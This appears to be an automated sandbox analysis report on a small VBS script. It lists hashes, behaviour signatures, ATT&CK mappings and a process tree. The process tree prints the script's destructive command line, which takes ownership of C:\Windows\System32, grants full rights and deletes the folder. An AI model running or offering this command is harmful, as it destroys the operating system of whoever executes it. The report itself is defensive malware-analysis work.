dc83fb002acfc2179b1e82046f5827f14a5ed2bd58503403155b0cef21f89533

Analysis

max time kernel
148s
max time network
149s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
25-05-2024 16:19

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

target.vbs
Size

209B
MD5

fe505a5e05c25e1b991d6f6094899bdf
SHA1

3dda3dbed85f227a9563b8b7e94b1fbfc9ec5d99
SHA256

dc83fb002acfc2179b1e82046f5827f14a5ed2bd58503403155b0cef21f89533
SHA512

c7c39c1ddcb6c4a83489b14c459f0446bd1585bf4d840e7026a08b4341584ee48381b23a182f3f7fc74c04568a6428b00ffadab5954dbd6e3f2967b805c5340f

Score

8^/10

discovery exploit

Malware Config

Signatures

Drops file in Drivers directory 64 IoCs

Processes:

cmd.exe

description	ioc	process
File opened for modification	C:\Windows\System32\drivers\hidusb.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\http.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\rdpbus.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\tdx.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\amdppm.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\msfs.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\mslldp.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\msquic.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\Ndu.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\npfs.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\rteth.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\storahci.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\dfsc.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\watchdog.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\srv2.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\csc.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\rspndr.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\srvnet.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\Vid.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\VR7DGM~1.SYS	cmd.exe
File opened for modification	C:\Windows\System32\drivers\hidclass.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\gpuenergydrv.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\null.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\storqosflt.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\vhdmp.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\drmk.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\mrxsmb.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\dxgmms2.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\pacer.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\kdnic.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\cdrom.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\ks.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\usbehci.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\usbhub.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\afd.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\dxgkrnl.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\HdAudio.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\kbdclass.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\mouclass.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\mssmbios.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\Rtnic64.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\wcifs.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\cldflt.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\Diskdump.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\hidparse.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\i8042prt.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\ksthunk.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\mmcss.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\mouhid.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\portcls.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\afunix.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\monitor.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\netbt.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\nsiproxy.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\lltdio.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\cimfs.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\hdaudbus.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\tdi.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\vwififlt.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\cdfs.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\beep.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\ndiscap.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\PEAuth.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\rdbss.sys	cmd.exe

Manipulates Digital Signatures 1 IoCs
Attackers can apply techniques such as modifying certain DLL exports to make their binary seem valid.

Processes:

cmd.exe

description ioc process

File opened for modification C:\Windows\System32\wintrust.dll cmd.exe
Possible privilege escalation attempt 2 IoCs
exploit

Processes:

takeown.exeicacls.exe

pid process

3588 takeown.exe
1640 icacls.exe

description	ioc	process
File opened for modification	C:\Windows\System32\wintrust.dll	cmd.exe

pid	process
3588	takeown.exe
1640	icacls.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WScript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation	WScript.exe

Loads dropped DLL 12 IoCs

Processes:

pid process

2748
2748
2748
2748
2748
2748
2748
2748
2748
2748
2748
2748
Modifies file permissions 1 TTPs 2 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

takeown.exeicacls.exe

pid process

3588 takeown.exe
1640 icacls.exe

pid	process
2748
2748
2748
2748
2748
2748
2748
2748
2748
2748
2748
2748

pid	process
3588	takeown.exe
1640	icacls.exe

Drops file in System32 directory 64 IoCs

Processes:

cmd.exe

description	ioc	process
File opened for modification	C:\Windows\System32\cdpsvc.dll	cmd.exe
File opened for modification	C:\Windows\System32\dhcpcsvc6.dll	cmd.exe
File opened for modification	C:\Windows\System32\cdp.dll	cmd.exe
File opened for modification	C:\Windows\System32\fwpolicyiomgr.dll	cmd.exe
File opened for modification	C:\Windows\System32\WaaSAssessment.dll	cmd.exe
File opened for modification	C:\Windows\System32\winevt\Logs\MI03A7~1.EVT	cmd.exe
File opened for modification	C:\Windows\System32\winevt\Logs\MIA934~1.EVT	cmd.exe
File opened for modification	C:\Windows\System32\ShellExperiences\Windows.UI.Shell.SharedUtilities.dll	cmd.exe
File opened for modification	C:\Windows\System32\TileDataRepository.dll	cmd.exe
File opened for modification	C:\Windows\System32\computenetwork.dll	cmd.exe
File opened for modification	C:\Windows\System32\umpoext.dll	cmd.exe
File opened for modification	C:\Windows\System32\AudioSrvPolicyManager.dll	cmd.exe
File opened for modification	C:\Windows\System32\StartTileData.dll	cmd.exe
File opened for modification	C:\Windows\System32\PhotoMetadataHandler.dll	cmd.exe
File opened for modification	C:\Windows\System32\sppsvc.exe	cmd.exe
File opened for modification	C:\Windows\System32\tdh.dll	cmd.exe
File opened for modification	C:\Windows\System32\ubpm.dll	cmd.exe
File opened for modification	C:\Windows\System32\BluetoothApis.dll	cmd.exe
File opened for modification	C:\Windows\System32\cryptxml.dll	cmd.exe
File opened for modification	C:\Windows\System32\dpapi.dll	cmd.exe
File opened for modification	C:\Windows\System32\en-US\combase.dll.mui	cmd.exe
File opened for modification	C:\Windows\System32\Windows.Security.Authentication.Web.Core.dll	cmd.exe
File opened for modification	C:\Windows\System32\nlaapi.dll	cmd.exe
File opened for modification	C:\Windows\System32\themeservice.dll	cmd.exe
File opened for modification	C:\Windows\System32\cscobj.dll	cmd.exe
File opened for modification	C:\Windows\System32\daxexec.dll	cmd.exe
File opened for modification	C:\Windows\System32\en-US\win32spl.dll.mui	cmd.exe
File opened for modification	C:\Windows\System32\lmhsvc.dll	cmd.exe
File opened for modification	C:\Windows\System32\winevt\Logs\SYSTEM~1.EVT	cmd.exe
File opened for modification	C:\Windows\System32\ncryptsslp.dll	cmd.exe
File opened for modification	C:\Windows\System32\Windows.CloudStore.Schema.Shell.dll	cmd.exe
File opened for modification	C:\Windows\System32\wlidprov.dll	cmd.exe
File opened for modification	C:\Windows\System32\en-US\crypt32.dll.mui	cmd.exe
File opened for modification	C:\Windows\System32\linkinfo.dll	cmd.exe
File opened for modification	C:\Windows\System32\Windows.UI.Xaml.dll	cmd.exe
File opened for modification	C:\Windows\System32\config\BBI.LOG2	cmd.exe
File opened for modification	C:\Windows\System32\ELSCore.dll	cmd.exe
File opened for modification	C:\Windows\System32\NfcRadioMedia.dll	cmd.exe
File opened for modification	C:\Windows\System32\usermgrcli.dll	cmd.exe
File opened for modification	C:\Windows\System32\wuapi.dll	cmd.exe
File opened for modification	C:\Windows\System32\catroot2\{F750E~1\catdb	cmd.exe
File opened for modification	C:\Windows\System32\DWrite.dll	cmd.exe
File opened for modification	C:\Windows\System32\winevt\Logs\MI6343~1.EVT	cmd.exe
File opened for modification	C:\Windows\System32\vssapi.dll	cmd.exe
File opened for modification	C:\Windows\System32\wlanapi.dll	cmd.exe
File opened for modification	C:\Windows\System32\dllhost.exe	cmd.exe
File opened for modification	C:\Windows\System32\localspl.dll	cmd.exe
File opened for modification	C:\Windows\System32\RpcRtRemote.dll	cmd.exe
File opened for modification	C:\Windows\System32\SebBackgroundManagerPolicy.dll	cmd.exe
File opened for modification	C:\Windows\System32\winevt\Logs\MI4C58~1.EVT	cmd.exe
File opened for modification	C:\Windows\System32\en-US\edgehtml.dll.mui	cmd.exe
File opened for modification	C:\Windows\System32\vertdll.dll	cmd.exe
File opened for modification	C:\Windows\System32\winevt\Logs\MI167B~1.EVT	cmd.exe
File opened for modification	C:\Windows\System32\WPTaskScheduler.dll	cmd.exe
File opened for modification	C:\Windows\System32\config\SYSTEM~1\AppData\Local\MICROS~1\Windows\WebCache\WEBCAC~1.JFM	cmd.exe
File opened for modification	C:\Windows\System32\HrtfApo.dll	cmd.exe
File opened for modification	C:\Windows\System32\en-US\elscore.dll.mui	cmd.exe
File opened for modification	C:\Windows\System32\fltLib.dll	cmd.exe
File opened for modification	C:\Windows\System32\usbmon.dll	cmd.exe
File opened for modification	C:\Windows\System32\Windows.UI.Input.Inking.dll	cmd.exe
File opened for modification	C:\Windows\System32\winevt\Logs\MIDE4D~1.EVT	cmd.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\INPUT~1.INF\hidclass.sys	cmd.exe
File opened for modification	C:\Windows\System32\msdelta.dll	cmd.exe
File opened for modification	C:\Windows\System32\win32kbase.sys	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

takeown.exe

description pid process

Token: SeTakeOwnershipPrivilege 3588 takeown.exe

description	pid	process
Token: SeTakeOwnershipPrivilege	3588	takeown.exe

Suspicious use of WriteProcessMemory 6 IoCs

Processes:

WScript.execmd.exe

description	pid	process	target process
PID 2552 wrote to memory of 3560	2552	WScript.exe	cmd.exe
PID 2552 wrote to memory of 3560	2552	WScript.exe	cmd.exe
PID 3560 wrote to memory of 3588	3560	cmd.exe	takeown.exe
PID 3560 wrote to memory of 3588	3560	cmd.exe	takeown.exe
PID 3560 wrote to memory of 1640	3560	cmd.exe	icacls.exe
PID 3560 wrote to memory of 1640	3560	cmd.exe	icacls.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\target.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2552

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c takeown /f C:\Windows\System32 /r /d y && icacls C:\Windows\System32 /grant administrators:F /t && rmdir /s /q C:\Windows\System32
2⤵
- Drops file in Drivers directory
- Manipulates Digital Signatures
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:3560

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32 /r /d y
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:3588

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32 /grant administrators:F /t
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1640

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Windows\System32\IPHLPAPI.DLL
Filesize
224KB

MD5
567a217405f41caea18f4bab50d480fd

SHA1
90f870f43852b3fd62110692030bd20887777c0e

SHA256
41f7a696a02b5dcba85e12a4999423bdebb1215662059adae955f8081e3ffa78

SHA512
a63fb148b5db3a5738142254840e007ffab7139ed2e7a672446f613e83ee8731bcad830c860e5523f69113fea938f8bb5a59147ea641bc799aff16200d90cb00

Download Submit
C:\Windows\System32\OnDemandConnRouteHelper.dll
Filesize
72KB

MD5
1f009de6a013a282d07436241512c056

SHA1
f0d37e1e76a199135e00c0a36b154b191a0950a9

SHA256
c897c345c3bcf3e96589a0feeea8b6d26cf33c091ac3ee2162dd27f8a79c3ff5

SHA512
57971d5df5bd9fad066378b280898e1f6e074805cc765448b99409550f97d74bf5bbd11e48e28e53f22be69cd9cd0ff58caa1e92f94fed7cbb4cd45c8f0c4d37

Download Submit
C:\Windows\System32\dhcpcsvc.dll
Filesize
99KB

MD5
912357f8e08213ba9cea37721b5ed46b

SHA1
9ac131aba943b6e80ee4b9ce9b39f943d82be583

SHA256
691a7aff42d558fac26f2a9de6b47d7596b130e730597dc3aff6025cb484d4a1

SHA512
7b87471adea7a0ca01097d0520c6f62c2e56fc7519fc436e5b48ab9c51df108834040ac15079a9a23e478c486ce7cb21b1b92a02f4c1ffe7b5ace6839437b253

Download Submit
C:\Windows\System32\dhcpcsvc6.dll
Filesize
71KB

MD5
394fb739c0f202fd65b0fea640d192f6

SHA1
bee425e28c99fe5b27faf3aaed0be0ea582ef7a5

SHA256
ced3c74f4960e26b648ec5360fe6b1ce47ed4f7a203d8c9798b450e8346b698e

SHA512
86660097ce8f692c7eae9555a90983e9f8f9463b469286e2d0f3fc7a628370196f60ff9a639ec9bd0eada1c94ca9ce39a714df3cf1c985b23e5f23d2f2034667

Download Submit
C:\Windows\System32\mswsock.dll
Filesize
408KB

MD5
89ca286e36756dd0dde53acd953f44dc

SHA1
cbd9fd0961f47398df85ae5d89d895c3737106db

SHA256
055f34466511dbeba4f082b110216ce9c1c7f056d4f1440d62d5442971a7b1cc

SHA512
341051e1353eb7ea8e8b2bd2783ff1da76922fa3513db524114bb52925550dc5c4ca92c59938de498514ad696310f7e7105ba34e8340efcd2fb2f3d80cf09410

Download Submit
C:\Windows\System32\netprofm.dll
Filesize
223KB

MD5
fb9d4949ca739ff6ae9ff9e43809ad7d

SHA1
59f3d1cbd504170a0de4f6ae4b5e31b7beedb8f0

SHA256
d8e0e9f86c41f8b926e5e6f9ff2952a994b24f5cb36d4fc4ae9badd06ef6dc90

SHA512
b1ef2f4913033519771d8b75953e93ac3249ac8b3f5028eb7f65d8d0b8a3f0e11aab0da7454d463459e1c7517211d8fe0dbf1c68bd8e47807f921b82c504642c

Download Submit
C:\Windows\System32\npmproxy.dll
Filesize
46KB

MD5
4476ab6612b200ceb6957ff436e10877

SHA1
d56614e23a02d7939b165f44c8802b7da7196a40

SHA256
7ca45c539218d4a186ee520c4afc29a931a34b2ed83fe10e3b8b23132e2ce520

SHA512
3b12e9265ae3b57193ca678612b1c7e2004077bdef8fda1b050a451f53bb612baeba6f89aa1327a7bc4614d66b67ffc14475f4e41204d8cc3947fa51f0ef8c29

Download Submit
C:\Windows\System32\nsi.dll
Filesize
24KB

MD5
3bacc52f844ea1b30b8ef8ba0d08bf0d

SHA1
031070c5ae780472e409f1e49ddde124849dfa45

SHA256
21293c3d3ba83ccc45135f33d2c70bffae7a347e9f0b9fd556622cef99291923

SHA512
c8befa3d89234a68754683299e3c63f7b0c4465743d07ed48cecc5e0c34b9c4756f71ab29695790b7cacc382f7f9cca4b3111f9717694e4518567300920b30b8

Download Submit
C:\Windows\System32\webio.dll
Filesize
586KB

MD5
743dbafa395cf6a3edbddc785b3903b7

SHA1
7102353adab408fa68ccf1632fe8b33096b7e9d5

SHA256
a0572142ce2d871319eec032cfc9397a3531dfadaa6c836ee0070878409bde94

SHA512
15fdb766c1d9ad6b8a7be94042235fa87d892d4381055e9af2387fcbba8e294fe0160d74b40f0875992ffba98d3505e874ab946b5e2e68e2a46510bb84f62323

Download Submit
C:\Windows\System32\winhttp.dll
Filesize
1.0MB

MD5
9a00e598d3dd0aea191abaf6b6825187

SHA1
0bb2af1b1edb22cb65398e3739e1863378b83d32

SHA256
dc62a2ed8778c75b29e5be10092cfa4aecfd6f7bffdda031152f0cad704d5bca

SHA512
dac9e1974a71b6d580a65062b7d7d0e17edf82f5eb3fe458c8ba7f39052fe82f9346874d7fc54f2fe523f05b0239a1c0b1eb99545a3185a8cb493b0094e50e92

Download Submit
C:\Windows\System32\winnsi.dll
Filesize
34KB

MD5
c552b64bad90764055c33e68ec8250f9

SHA1
5a52e89c3e290eadf41c3b5babf3b88bc0087299

SHA256
4824fce965b9dec8d78842cdc3ebcdf8d2d2ed15de05d5007fb18c1b2de79e11

SHA512
369d86b338c477f6706e80457d34abb7a0be916cba5e90d2bad664e7b5c66eb8841c2c36ca6abf70ce30bc21e23f4c63701518b3f3ff9a38b046a25eafa72c98

Download Submit